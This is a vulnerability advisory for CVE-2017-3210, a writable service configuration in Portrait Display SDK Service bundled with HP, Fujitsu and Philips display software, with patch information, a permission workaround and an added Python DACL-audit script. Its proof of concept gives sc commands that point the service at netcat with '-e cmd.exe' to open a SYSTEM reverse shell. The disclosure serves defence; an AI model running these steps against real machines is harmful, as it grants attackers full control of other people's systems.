
Portrait Display SDK Service Privilege Escalation

Published: 26 Apr 2017
Reported by: W. Schober
Type: packetstorm
Source: packetstormsecurity.com

Privilege Escalation in Portrait Display SDK Service due to insecure service configuration allowing arbitrary code execution and shell access with SYSTEM user privileges

SEC Consult Vulnerability Lab Security Advisory < 20170425-0 >  
=======================================================================  
title: Privilege Escalation due to insecure service configuration  
product: Portrait Display SDK Service  
vulnerable version: multiple, see PoC  
fixed version: multiple, see solution  
CVE number: CVE-2017-3210  
impact: critical  
homepage: http://www.portrait.com/  
found: 2017-02-23  
by: W. Schober (Office Vienna)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow  
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich  
  
https://www.sec-consult.com  
=======================================================================  
  
Vendor description:  
-------------------  
"For nearly 20 years, Portrait Displays has provided customized software to  
OEM monitor manufacturers across the globe. We develop tailored solutions,  
encompassing the needs of today's changing marketplace.  
  
Our technologies allow OEMs to provide their end users with a premium  
interactive experience. Our engineers work hand-in-hand with leading OEMS,  
ODMs, and GPU and scaler companies, to develop and implement cutting-edge  
software solutions."  
  
Source: http://www.portrait.com/technology.html  
  
  
Business recommendation:  
------------------------  
SEC Consult recommends not to use this service in a production environment  
until a thorough security review has been performed by security professionals  
and all identified issues have been resolved.  
  
  
Vulnerability overview/description:  
-----------------------------------  
The service configuration of the Portrait Display SDK Service (PdiService.exe)  
was found to be writable by every authenticated user in a default installation.  
This allows a local attacker to execute arbitrary code, elevate privileges and  
obtain a shell with the privileges of the SYSTEM user.  
  
The Portrait Display SDK Service is embedded in OEM display software that  
ships by default on a wide range of notebooks. The software containing the  
SDK acts as a virtual OSD (On Screen Display) for "tuning" displays, e.g.  
setting gamma values and changing colour values.  
  
The vulnerability was identified in the software "DisplayView Click" from  
Fujitsu. Because the SDK is used in several software packages, SEC Consult  
tried to identify other potentially vulnerable packages rebranded by  
Portrait Displays, Inc. The following list is an excerpt of packages  
containing the SDK, some of which are installed by default on notebooks of  
HP, Philips, Fujitsu, etc.  
  
  
-) Fujitsu DisplayView Click v5  
-) Fujitsu DisplayView Click v6  
-) HP Display Assistant  
-) HP Display Control  
-) HP Mobile Display Assistant v1  
-) HP Mobile Display Assistant v2  
-) HP My Display  
-) HP My Display All-In-One/TouchSmart  
-) HP Picture in Picture  
-) Philips SmartControl II  
-) Philips SmartControl Lite  
-) Philips SmartControl Premium  
  
  
Portrait Displays Inc. confirmed that at least the following packages are  
vulnerable:  
  
Fujitsu DisplayView Click  
Version 6.0 build id: dtune-fts-R2014-04-22-1630-07, 6.01  
build id: dtune-fts-R2014-05-13-1436-35  
The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51  
  
Fujitsu DisplayView Click Suite Version 5  
build id: dtune-fus-R2012-09-26-1056-32  
The issue is addressed by patch in Version 5.9 build id:  
dtune-fus-R2017-04-01-1212-32  
  
HP Display Assistant Version 2.1  
build id: dtune-hwp-R2012-10-31-1329-38  
The issue was fixed in Version 2.11 build id: dtune-hwp-R2013-10-11-1504-22  
and above  
  
HP My Display Version 2.01  
build id: dtune-hpc-R2013-01-10-1507-17  
The issue was fixed in Version 2.1 build id: dtune-hpc-R2014-06-27-1655-15 and  
above  
  
Philips Smart Control Premium  
Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13, 2.25  
build id: dtune-plp-R2014-08-29-1016-05  
The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07  
  
Furthermore, a more detailed summary of this advisory has been published at our  
blog:  
http://blog.sec-consult.com/2017/04/what-unites-hp-philips-and-fujitsu-one.html  
  
Proof of concept:  
-----------------  
To identify the permissions of the service, the built-in Windows command "sc"  
was used (sc sdshow pdiservice), which prints the service's security descriptor  
in SDDL notation. The output for the vulnerable service can be seen below:  
  
(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)  
(A;;CCLCSWRPWPDTLOCRRC;;;SY)  
(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)  
(A;;CCLCSWLOCRRC;;;IU)  
(A;;CCLCSWLOCRRC;;;SU)  
  
By translating the Security Descriptor Definition Language (SDDL) entries into  
their human-readable equivalents, SEC Consult identified the following  
permissions for the PdiService:  
  
RW NT AUTHORITY\Authenticated Users  
RW NT AUTHORITY\SYSTEM  
RW BUILTIN\Administrators  
R NT AUTHORITY\INTERACTIVE  
R NT AUTHORITY\SERVICE  
  
The ACE for Authenticated Users (AU) includes DC (SERVICE_CHANGE_CONFIG), WD  
(WRITE_DAC) and WO (WRITE_OWNER), so every authenticated user can rewrite the  
service configuration, including the path of the binary that the Service  
Control Manager launches. PdiService runs in the context of the SYSTEM  
account, as many Windows services do, so the replaced binary is executed with  
SYSTEM privileges, resulting in privilege escalation.  
  
The workflow to execute arbitrary code is as follows (each sc command is  
entered on a single line; note the original binPath= value first so it can be  
restored afterwards):  
1) Stop the service  
sc stop pdiservice  
2) Alter the service binary path (nc.exe is a netcat binary the attacker has  
placed on the host; 127.0.0.1:4242 is the listener used during the test)  
sc config pdiservice binpath= "C:\nc.exe -nv 127.0.0.1 4242 -e C:\WINDOWS\System32\cmd.exe"  
3) Start the service  
sc start pdiservice  
  
Because nc.exe never registers with the Service Control Manager, "sc start"  
reports a start error once the SCM's start timeout expires; by then the  
process has already been launched as SYSTEM and has connected back to the  
listener.  
  
  
Vulnerable / tested versions:  
-----------------------------  
The affected and fixed versions, as confirmed by Portrait Displays Inc., are  
listed under "Vulnerability overview/description" above.  
  
Vendor contact timeline:  
------------------------  
2017-03-01: Contacting vendor through email [email protected]  
2017-03-01: Informing CERT/CC, asking for coordination support regarding HW  
vendors, assigned VU#219739  
2017-03-01: The vendor responds and requests all attachments as plaintext in  
the email body because they are not allowed to open any attachments  
from "unknown parties".  
Therefore SEC Consult sends the PGP Public Keys as plaintext in the  
body of the email.  
2017-03-08: Contacting vendor again on how to transmit the advisory; no answer  
2017-03-15: Informing CERT/CC about the status, asking for support to contact  
the vendor  
2017-03-16: The Vendor provides a public key for encrypted communication;  
The advisory got securely transmitted to the vendor.  
2017-03-18: The vendor responds and confirms that they were able to reproduce  
the vulnerability. Detailed information on which brands are  
affected, as well as a timeline for an update, will be provided next  
week.  
2017-03-28: Requesting update from Portrait Displays Inc., asking about the  
current state and a list of affected vendors.  
2017-03-29: Vendor responds that they are still in the process of evaluating  
which 3rd parties are affected.  
2017-04-06: Vendor updates us with information about the planned release  
schedule and affected vendors. Portrait is still in the process of  
evaluating which 3rd parties are affected. The list should be  
available at the end of the week. A patch that removes the invalid  
permission will be available on the vendor's website.  
2017-04-17: Vendor provides us with a detailed list of affected products.  
2017-04-18: Vendor publicly releases a patch for the vulnerability on their  
website (http://www.portrait.com/securityupdate.html)  
2017-04-21: SEC Consult requests a CVE from CERT/CC and coordinates the  
disclosure of the CERT VU and the SEC Consult advisory.  
2017-04-25: Public release.  
  
Solution:  
---------  
Since the 18th of April 2017 a patch is available.  
See: http://www.portrait.com/securityupdate.html  
  
Workaround:  
-----------  
To quickly get rid of the vulnerability, the permissions of the service should  
be altered with the built-in Windows command "sc" from an elevated command  
prompt. To remove the "Authenticated Users" ACE entirely, the following  
command can be used (the SDDL string is a single argument and must be entered  
on one line):  
  
sc sdset pdiservice D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)  
  
The new descriptor can be verified afterwards with "sc sdshow pdiservice".  
  
This will result in the following set of permissions:  
RW NT AUTHORITY\SYSTEM  
RW BUILTIN\Administrators  
R NT AUTHORITY\INTERACTIVE  
R NT AUTHORITY\SERVICE  
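The SDDL shown in the proof of concept and the corrected descriptor from the  
workaround can be checked mechanically rather than by reading the letter codes  
by hand. The following Python script is an added example, not code from SEC  
Consult or from Portrait Displays: it parses the ACEs of a service security  
descriptor as printed by "sc sdshow", reproduces the R/RW summary given above,  
and flags every principal outside SYSTEM and Administrators that holds a right  
allowing it to take over the service (SERVICE_CHANGE_CONFIG, WRITE_DAC,  
WRITE_OWNER or a generic write/all right). The right-code table follows the  
Windows service access-rights documentation, the two embedded descriptors are  
the ones from this advisory, and audit_service() is an assumed helper for use  
on a live Windows host.  

```python
"""Audit a Windows service DACL (the SDDL string `sc sdshow <service>` prints)
for principals that can reconfigure the service. Added example for this
advisory, not code from SEC Consult or Portrait Displays; the embedded SDDL
strings are the ones the advisory prints (shipped) and recommends (workaround).
"""
import re
import subprocess

# SDDL right code -> (access-mask bit, Win32 name). On service objects the
# object-specific codes CC..CR denote the SERVICE_* rights listed here.
RIGHTS = {
    "CC": (0x00001, "SERVICE_QUERY_CONFIG"),
    "DC": (0x00002, "SERVICE_CHANGE_CONFIG"),
    "LC": (0x00004, "SERVICE_QUERY_STATUS"),
    "SW": (0x00008, "SERVICE_ENUMERATE_DEPENDENTS"),
    "RP": (0x00010, "SERVICE_START"),
    "WP": (0x00020, "SERVICE_STOP"),
    "DT": (0x00040, "SERVICE_PAUSE_CONTINUE"),
    "LO": (0x00080, "SERVICE_INTERROGATE"),
    "CR": (0x00100, "SERVICE_USER_DEFINED_CONTROL"),
    "SD": (0x10000, "DELETE"),
    "RC": (0x20000, "READ_CONTROL"),
    "WD": (0x40000, "WRITE_DAC"),
    "WO": (0x80000, "WRITE_OWNER"),
    "GA": (0x10000000, "GENERIC_ALL"),
    "GW": (0x40000000, "GENERIC_WRITE"),
}
# Well-known SID aliases. "WD" here means Everyone, while in the rights field
# the same two letters mean WRITE_DAC: parse by field position, never by
# substring search.
SIDS = {"AU": "NT AUTHORITY\\Authenticated Users", "SY": "NT AUTHORITY\\SYSTEM",
        "BA": "BUILTIN\\Administrators", "IU": "NT AUTHORITY\\INTERACTIVE",
        "SU": "NT AUTHORITY\\SERVICE", "WD": "Everyone", "BU": "BUILTIN\\Users"}
# Rights that change service state or configuration ("W" in the advisory).
WRITE_LIKE = {"DC", "WD", "WO", "SD", "RP", "WP", "DT", "GA", "GW"}
# The subset that lets the holder choose what the service executes, or rewrite
# the DACL to get there. DC alone is enough for `sc config ... binpath=`.
TAKEOVER = {"DC", "WD", "WO", "GA", "GW"}
TRUSTED = {"SY", "BA"}
# One ACE: (type;flags;rights;object_guid;inherit_object_guid;account_sid)
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")

def access_mask(rights):
    """ACE rights field (two-letter codes or 0x-hex) -> integer access mask."""
    if rights.startswith("0x"):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):
        code = rights[i:i + 2]
        if code not in RIGHTS:
            raise ValueError("unknown right code %r in %r" % (code, rights))
        mask |= RIGHTS[code][0]
    return mask

def parse_dacl(sddl):
    """[(ace_type, sid, mask)] for the DACL of a full descriptor
    ("O:..G:..D:(..)S:(..)") or of the bare ACE run that `sc sdshow` prints."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else sddl
    dacl = dacl.split("S:", 1)[0]  # ignore a SACL if one follows
    return [(t, sid, access_mask(r))
            for t, _flags, r, _obj, _iobj, sid in ACE_RE.findall(dacl)]

def held(mask, codes):
    """Sorted Win32 names of the rights in `codes` that `mask` grants."""
    return sorted(RIGHTS[c][1] for c in codes if mask & RIGHTS[c][0])

def summarize(sddl):
    """Principal -> "R"/"RW", the coarse view the advisory gives of the DACL."""
    return {SIDS.get(sid, sid): ("RW" if held(mask, WRITE_LIKE) else "R")
            for t, sid, mask in parse_dacl(sddl) if t == "A"}

def find_weak_aces(sddl):
    """(principal, [rights]) for each allow-ACE that grants a takeover right to
    anyone but SYSTEM/Administrators. Deny ACEs are not evaluated."""
    return [(SIDS.get(sid, sid), held(mask, TAKEOVER))
            for t, sid, mask in parse_dacl(sddl)
            if t == "A" and sid not in TRUSTED and held(mask, TAKEOVER)]

def audit_service(name):
    """Assumed helper: read the live descriptor with sc.exe (Windows only)."""
    out = subprocess.check_output(["sc.exe", "sdshow", name], text=True)
    return find_weak_aces(out.strip())

# Descriptors from the advisory: PdiService as shipped, and after the
# `sc sdset` workaround that drops the Authenticated Users ACE.
VULNERABLE = ("D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
              "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)"
              "(A;;CCLCSWLOCRRC;;;SU)")
FIXED = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
         "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")

if __name__ == "__main__":
    for label, sddl in (("shipped", VULNERABLE), ("workaround", FIXED)):
        print(label, summarize(sddl))
        for principal, rights in find_weak_aces(sddl):
            print("  WEAK:", principal, "holds", ", ".join(rights))
```

Run as-is, the script reports Authenticated Users as holding SERVICE_CHANGE_CONFIG,  
WRITE_DAC and WRITE_OWNER on the shipped descriptor and finds nothing on the  
workaround descriptor; on a Windows host, audit_service("pdiservice") runs the  
same check against the live DACL. Deny ACEs and group membership are not  
evaluated: the check answers only whether an allow-ACE hands a takeover right  
to a principal other than SYSTEM or Administrators, which is exactly the  
condition the proof of concept exploits.  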
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow  
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/Career.htm  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF W. Schober / @2017  
  
